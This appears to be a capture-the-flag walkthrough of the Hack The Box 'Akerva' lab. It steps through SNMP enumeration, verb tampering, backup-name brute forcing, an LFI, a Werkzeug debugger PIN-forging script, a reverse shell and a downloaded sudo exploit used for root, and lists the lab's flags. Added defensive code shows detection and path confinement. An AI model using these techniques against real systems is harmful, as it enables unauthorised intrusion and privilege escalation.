NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 22:34 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating Ping Scan at 22:34
Scanning 10.13.37.11 [4 ports]
Completed Ping Scan at 22:34, 0.43s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:34
Scanning akerva.htb (10.13.37.11) [1000 ports]
Discovered open port 22/tcp on 10.13.37.11
Discovered open port 80/tcp on 10.13.37.11
Discovered open port 5000/tcp on 10.13.37.11
Completed SYN Stealth Scan at 22:34, 5.96s elapsed (1000 total ports)
Initiating Service scan at 22:34
Scanning 3 services on akerva.htb (10.13.37.11)
Completed Service scan at 22:34, 25.70s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against akerva.htb (10.13.37.11)
Retrying OS detection (try #2) against akerva.htb (10.13.37.11)
Initiating Traceroute at 22:34
Completed Traceroute at 22:34, 0.30s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:34
Completed Parallel DNS resolution of 2 hosts. at 22:34, 0.19s elapsed
NSE: Script scanning 10.13.37.11.
Initiating NSE at 22:34
Completed NSE at 22:35, 11.72s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 1.69s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for akerva.htb (10.13.37.11)
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 0d:e4:41:fd:9f:a9:07:4d:25:b4:bd:5d:26:cc:4f:da (RSA)
|   256 f7:65:51:e0:39:37:2c:81:7f:b5:55:bd:63:9c:82:b5 (ECDSA)
|_  256 28:61:d3:5a:b9:39:f2:5b:d7:10:5a:67:ee:81:a8:5e (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://10.13.37.11/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
5000/tcp open  http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
| http-auth:
| HTTP/1.0 401 UNAUTHORIZED\x0D
|_  Basic realm=Authentication Required
| http-methods:
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Android 4.2.2 (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 36.817 days (since Fri Jun 19 02:58:34 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   299.62 ms 10.13.14.1
2   299.73 ms akerva.htb (10.13.37.11)

NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.05 seconds
           Raw packets sent: 1240 (57.962KB) | Rcvd: 1062 (45.946KB)
PORT 80
SOURCE – CODE
Here we go with our 1st flag:
AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}
Next we look at UDP port 161 (SNMP).
To enumerate the SNMP service we use snmp-check with the default community string public and SNMP version 2c:
snmp-check 10.13.37.11 -c public -v 2c
We save the output to a file, because snmp-check returns a large amount of data.
OUTPUT:
<----->
  1233  runnable  cron              /usr/sbin/CRON -f
  1234  runnable  cron              /usr/sbin/CRON -f
  1235  runnable  sh                /bin/sh -c /opt/check_backup.sh
  1236  runnable  sh                /bin/sh -c /opt/check_devSite.sh
  1237  runnable  check_backup.sh   /bin/bash /opt/check_backup.sh
  1238  runnable  check_devSite.s   /bin/bash /opt/check_devSite.sh
  1241  runnable  backup_every_17   /bin/bash /var/www/html/scripts/backup_every_17minutes.sh AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
  1242  runnable  space_dev.py      /usr/bin/python /var/www/html/dev/space_dev.py
  1247  runnable  python            /usr/bin/python /var/www/html/dev/space_dev.py
<----->
Here we go with our 2nd flag
AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
The process list shows a backup script, /var/www/html/scripts/backup_every_17minutes.sh, that we want to read, but requesting it (like the other files we tried) is denied. So we send the request through Burp.
Instead of a GET request we use POST.
Here is the result, and the 3rd flag:
AKERVA{IKNoW###VeRbTamper!nG_==}
The script returned by the POST request looks like this:
#!/bin/bash
#
# This script performs backups of production and development websites.
# Backups are done every 17 minutes.
#
# AKERVA{IKNoW###VeRbTamper!nG_==}
#

SAVE_DIR=/var/www/html/backups

while true
do
    ARCHIVE_NAME=backup_$(date +%Y%m%d%H%M%S)
    echo "Erasing old backups..."
    rm -rf $SAVE_DIR/*
    echo "Backuping..."
    zip -r $SAVE_DIR/$ARCHIVE_NAME /var/www/html/*
    echo "Done..."
    sleep 1020
done
What this script means is that every 17 minutes akerva.htb saves a backup of the web root into the backups directory, under a name built from the server's current time:
backup_[year month day hour minute second]
We use curl with the --head flag against akerva.htb, because we need the server's clock (its Date header), not our own: our machine's time differs from the target's. The output looks like this:
┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #curl http://akerva.htb --head
HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Jul 2020 18:00:23 GMT
Server: Apache/2.4.29 (Ubuntu)
X-Pingback: http://10.13.37.11/xmlrpc.php
X-Redirect-By: WordPress
Location: http://10.13.37.11/
Content-Type: text/html; charset=UTF-8
From the server time we build the name of the backup file we will download afterwards:
25 Jul 2020 18:00:23 >> backup_2020072518XXXX
XXXX stands for the minutes and seconds, which we do not know, so we fuzz them with a wordlist of all four-digit numbers.
COMMAND TO DO THAT:
┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #wfuzz -u http://akerva.htb/backups/backup_2020072518FUZZ.zip -w 4digit.txt --hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://akerva.htb/backups/backup_2020072518FUZZ.zip
Total requests: 10000

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000001630:   200        82522 L  810989 W 20937179 Ch "1629"
000008014:   404        9 L      31 W     272 Ch     "8013"
Now we simply download the backup zip that wfuzz found:
wget http://akerva.htb/backups/backup_20200725181629.zip
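From the defender's side, the backup bug above is a predictable archive name in a web-served directory, and the brute force of the timestamp leaves a very recognisable trace: thousands of 404s for /backups/backup_*.zip from one client, followed by a single 200. The following detection is an added example, not part of the walkthrough: it parses Apache combined-format log lines (the sample lines are constructed here, not taken from the target) and raises an alert for a client that produces many 404s on backup-archive paths inside a short window, and for any successful download of such an archive.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" log format; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Archives named the way the target's backup script names them: backup_YYYYmmddHHMMSS.zip
BACKUP_RE = re.compile(r'^/backups/backup_\d{14}\.zip$')


def parse_line(line):
    """Return a dict with ip, timestamp (aware datetime), method, path, status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def detect_backup_probing(lines, threshold=20, window=timedelta(minutes=5)):
    """Alert on (a) clients with `threshold` or more 404s on backup-archive paths
    within `window` (timestamp brute force) and (b) any 2xx on such a path."""
    recent = defaultdict(deque)   # ip -> timestamps of recent 404 probes
    flagged = set()               # ips already reported for enumeration
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not BACKUP_RE.match(rec['path']):
            continue
        ip, ts, status = rec['ip'], rec['ts'], rec['status']
        if 200 <= status < 300:
            alerts.append({'ip': ip, 'kind': 'backup_download', 'path': rec['path']})
            continue
        if status != 404:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop probes older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append({'ip': ip, 'kind': 'backup_enumeration', 'count': len(q)})
    return alerts


def make_sample_log():
    """Constructed log lines (not real traffic): one client guessing 30 archive
    names and then fetching the right one, plus an ordinary visitor."""
    base = datetime(2020, 7, 25, 18, 1, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 272 "-" "{ua}"'
    lines = []
    for i in range(30):
        ts = (base + timedelta(seconds=i)).strftime('%d/%b/%Y:%H:%M:%S %z')
        lines.append(fmt.format(ip='10.13.14.10', ts=ts, status=404, ua='Wfuzz/2.4.5',
                                path='/backups/backup_2020072518%04d.zip' % i))
    ts = (base + timedelta(seconds=31)).strftime('%d/%b/%Y:%H:%M:%S %z')
    lines.append(fmt.format(ip='10.13.14.10', ts=ts, status=200, ua='Wget/1.20',
                            path='/backups/backup_20200725181629.zip'))
    lines.append(fmt.format(ip='192.0.2.7', ts=ts, status=200, ua='Mozilla/5.0',
                            path='/index.php'))
    lines.append(fmt.format(ip='192.0.2.7', ts=ts, status=404, ua='Mozilla/5.0',
                            path='/backups/backup_20200725180000.zip'))
    return lines


if __name__ == '__main__':
    for alert in detect_backup_probing(make_sample_log()):
        print(alert)
```

The threshold and window are tunable assumptions; a legitimate user never needs to ask for dozens of differently-timestamped archives, so even a low threshold is safe. The real fix is to write backups outside the web root with an unguessable name and restrictive permissions, and the detection only tells you when that fix is missing.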
ENUMERATING VAR FOLDER
Inside the extracted backup is a var folder; enumerating it, we find the script we saw running in the SNMP process list, /var/www/html/dev/space_dev.py:
┌─[root@liquid]─[~/Desktop/HTB/akervaC/var/www/html/dev]
└──╼ #cat space_dev.py
#!/usr/bin/python
from flask import Flask, request
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash

app = Flask(__name__)
auth = HTTPBasicAuth()

users = {
    "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
}

@auth.verify_password
def verify_password(username, password):
    if username in users:
        return check_password_hash(users.get(username), password)
    return False

@app.route('/')
@auth.login_required
def hello_world():
    return 'Hello, World!'

# TODO
@app.route('/download')
@auth.login_required
def download():
    return downloaded_file

@app.route("/file")
@auth.login_required
def file():
    filename = request.args.get('filename')
    try:
        with open(filename, 'r') as f:
            return f.read()
    except:
        return 'error'

if __name__ == '__main__':
    print(app)
    print(getattr(app, '__name__', getattr(app.__class__, '__name__')))
    app.run(host='0.0.0.0', port='5000', debug = True)
Here we go with our 4th flag
AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}
The script gives us a username, aas, and the password is the string that gets hashed, so let's try this flag as the password with aas as the username on port 5000, where we were asked for credentials.
We see the text Hello, World!
In the script, the /file route opens whatever path the filename parameter gives it, which looks like an LFI (arbitrary file read).
Let's try to get the flag from aas's home directory, and his SSH keys.
Here we got our 5th flag
AKERVA{IKNOW#LFi_@_}
But there is no id_rsa key, so we didn't get much from that.
After fuzzing we find a /console directory, which asks for a PIN.
So we need the PIN. The page title tells us what we are dealing with:
Werkzeug Debugger. A quick search turns up a way to recover the PIN.
The script for it needs the MAC address and the machine-id,
which we can read through the LFI we found earlier.
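The /file route is the root cause of the LFI: it hands the raw filename parameter to open(). The following is an added example (not code from the target's space_dev.py) of how that read should be confined to one directory. It resolves the request against a base directory with os.path.realpath, rejects absolute paths, traversal and symlinks that point outside, and returns the same generic 'error' the original route returns. The base directory and sample files are constructed in a temp dir so the block runs stand-alone; in the Flask app you would call read_confined(BASE_DIR, request.args.get('filename', '')) from the route.

```python
import os
import tempfile


class UnsafePath(ValueError):
    """Raised when a user-supplied path would escape the allowed directory."""


def resolve_inside(base_dir, user_path):
    """Return the real absolute path of user_path under base_dir, or raise
    UnsafePath if it escapes (absolute path, '..' traversal, or a symlink
    whose target lies outside base_dir)."""
    base = os.path.realpath(base_dir)
    # os.path.join() discards base when user_path is absolute, so refuse those up front.
    if os.path.isabs(user_path):
        raise UnsafePath(user_path)
    # realpath() normalises '..' and follows symlinks, so the check below sees the
    # file that would actually be opened, not the name the client sent.
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath(user_path)
    return target


def read_confined(base_dir, user_path):
    """What the hardened /file handler returns: the file's content, or the
    generic string 'error' (no detail about why, as in the original route)."""
    try:
        path = resolve_inside(base_dir, user_path)
        with open(path, 'r') as f:
            return f.read()
    except (UnsafePath, OSError):
        return 'error'


def build_demo_dir():
    """Constructed layout for the demo: a 'public' directory with one readable
    file, a sibling secret outside it, and a symlink inside 'public' that
    points at the secret. Returns the public directory's path."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, 'public')
    os.mkdir(public)
    with open(os.path.join(public, 'hello.txt'), 'w') as f:
        f.write('hello')
    with open(os.path.join(root, 'secret.txt'), 'w') as f:
        f.write('top secret')
    os.symlink(os.path.join(root, 'secret.txt'), os.path.join(public, 'link.txt'))
    return public


if __name__ == '__main__':
    public = build_demo_dir()
    for name in ('hello.txt', '../secret.txt', '/etc/hostname', 'link.txt'):
        print('%-16s -> %r' % (name, read_confined(public, name)))
```

Two more things the same script gets wrong are independent of the path check: it runs with debug=True on 0.0.0.0, which is exactly what exposes the /console used later in this walkthrough, and it keeps the credential that doubles as a flag in the source. Confining the path does not fix either of those.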
We use Python to convert the MAC address (its hex digits, colons removed) into the decimal value that uuid.getnode() returns:
>>> print(0x5056b96d18)
345052376344
Whole code looks like this
import hashlib
from itertools import chain

probably_public_bits = [
    'aas',        # username
    'flask.app',  # modname
    'Flask',      # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'  # getattr(mod, '__file__', None),
]

private_bits = [
    '345052376344',                      # str(uuid.getnode()), /sys/class/net/ens33/address
    '258f132cd7e647caaf5510e3aca997c1'   # get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
Running this code gives us the PIN,
which we enter in the console and get something like this:
From the console we can execute Python, so we run a Python reverse shell.
And we get our shell:
┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.14.10] from (UNKNOWN) [10.13.37.11] 57478
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(aas) gid=1000(aas) groups=1000(aas),24(cdrom),30(dip),46(plugdev)
$ python -c 'import pty;pty.spawn("/bin/bash")'
aas@Leakage:~$ ls
ls
flag.txt
In the same directory there is also a hidden flag:
aas@Leakage:~$ cat .hiddenflag.txt
cat .hiddenflag.txt
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
Here we go with our 6th flag
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
After more searching and enumeration we find nothing else, so we check the version of sudo, since sudo prints some odd text when we try it. Let's check:
aas@Leakage:/opt$ sudo --version
sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
A search for this version turns up an exploit for it.
We clone the repo, compile it on our own machine, and then do the following on the target:
aas@Leakage:/tmp$ wget http://10.13.14.10/exploit
wget http://10.13.14.10/exploit
--2020-07-25 16:40:37--  http://10.13.14.10/exploit
Connecting to 10.13.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17480 (17K) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]  17.07K  26.8KB/s    in 0.6s

2020-07-25 16:40:39 (26.8 KB/s) - ‘exploit’ saved [17480/17480]

aas@Leakage:/tmp$ ls
ls
exploit
systemd-private-d387e08ebced48278578cfff30488f9b-apache2.service-FUVgpA
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-resolved.service-7xDcps
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-timesyncd.service-p8EwEw
vmware-root_625-4021587817
aas@Leakage:/tmp$ chmod +x exploit
chmod +x exploit
aas@Leakage:/tmp$ ./exploit
./exploit
[sudo] password for aas:
There's a lot of it about, you know.
# id
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(aas)
# cd /root
ls
cd /root
# ls
flag.txt  secured_note.md
# cat flag.txt
cat flag.txt
AKERVA{IkNow_Sud0_sUckS!}
Here we go with our 7th flag
AKERVA{IkNow_Sud0_sUckS!}
The secured_note.md file contains some text, so we copy it and base64-decode it; then our Python hash-identifier tool tells us it is Vigenère.
We use decode.fr to decode it, but decoding it directly only gives random letters, so first we check which letters actually occur in the string:
GOAHGHEEGSAEEHACEGULREPEEECEOKMKERFSESFRLKERUKTSVPMSSNHSKRFFAGIAPVETCNMDLVFHDAOGFLAFGSKEULMVOOWWCAHCRFVVNVHVCMSYELSPMIHHMODAUKHE
Some letters of the alphabet never appear in the ciphertext:
b, j, q, x, c
The string we need:
The set of letters (the alphabet) we need:
The string that will be present in the flag is AKERVA.
With all this, here we go:
Here we go with our 8th flag
AKERVA{IKNOOOWVIGEEENERRRE}
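What the last step relies on is the classic known-plaintext weakness of Vigenère: if you know a fragment of the plaintext (here, that AKERVA appears in the note) and the alphabet the cipher was built over (here, the letters that actually occur), subtracting the crib from the ciphertext at the right position gives the key letters directly. The block below is an added example, not the walkthrough's own steps or the real note's key: the alphabet is the 21 letters left after removing b, c, j, q and x as the page lists, and the key ORION and the message are constructed for illustration, since the page does not give the actual key or offset.

```python
# Vigenère over a restricted alphabet, with key recovery from a known-plaintext crib.
# Alphabet, key and message below are constructed for this example.
ALPHABET = "ADEFGHIKLMNOPRSTUVWYZ"   # A-Z without B, C, J, Q, X (the unused letters on the page)
KEY = "ORION"                        # constructed key, not the real note's key
PLAINTEXT = "THEFLAGSTARTSWITHAKERVA"
CRIB = "AKERVA"                      # known plaintext fragment, as in the writeup


def vigenere(text, key, alphabet, decrypt=False):
    """Shift each letter of text by its key letter's index in `alphabet`.
    Letters outside the alphabet pass through unchanged and do not consume key."""
    n = len(alphabet)
    pos = {c: i for i, c in enumerate(alphabet)}
    out, k = [], 0
    for ch in text:
        if ch not in pos:
            out.append(ch)
            continue
        shift = pos[key[k % len(key)]]
        if decrypt:
            shift = -shift
        out.append(alphabet[(pos[ch] + shift) % n])
        k += 1
    return ''.join(out)


def recover_key_from_crib(ciphertext, crib, alphabet, offset):
    """If `crib` is the plaintext at `offset`, return the key letters used there
    (ciphertext letter minus plaintext letter, modulo the alphabet size)."""
    n = len(alphabet)
    pos = {c: i for i, c in enumerate(alphabet)}
    return ''.join(alphabet[(pos[ciphertext[offset + i]] - pos[p]) % n]
                   for i, p in enumerate(crib))


def align_key(fragment, offset, period):
    """Place key letters recovered at `offset` into a repeating key of length
    `period`; positions the crib did not cover stay '?'."""
    key = ['?'] * period
    for j, ch in enumerate(fragment):
        key[(offset + j) % period] = ch
    return ''.join(key)


def demo():
    """Encrypt the constructed message, then recover the key using only the
    ciphertext, the alphabet, the crib and its offset, and decrypt with it."""
    cipher = vigenere(PLAINTEXT, KEY, ALPHABET)
    offset = PLAINTEXT.index(CRIB)      # 17 here; in practice you slide the crib along
    fragment = recover_key_from_crib(cipher, CRIB, ALPHABET, offset)
    key = align_key(fragment, offset, period=len(KEY))
    return {
        'ciphertext': cipher,
        'fragment': fragment,           # key stream under the crib: 'IONORI'
        'key': key,                     # realigned to period 5: 'ORION'
        'plaintext': vigenere(cipher, key, ALPHABET, decrypt=True),
    }


if __name__ == '__main__':
    for k, v in demo().items():
        print('%-10s %s' % (k, v))
```

When the crib's position is unknown you try every offset and keep the fragments that are consistent with a short period (the same letter recurring every key-length positions) or that spell a readable word; a six-letter crib over a five-letter key already determines the whole key, which is why a fixed string like AKERVA in every flag is enough to break the note.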
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
Thanks, really interesting!
Very nice, thanks.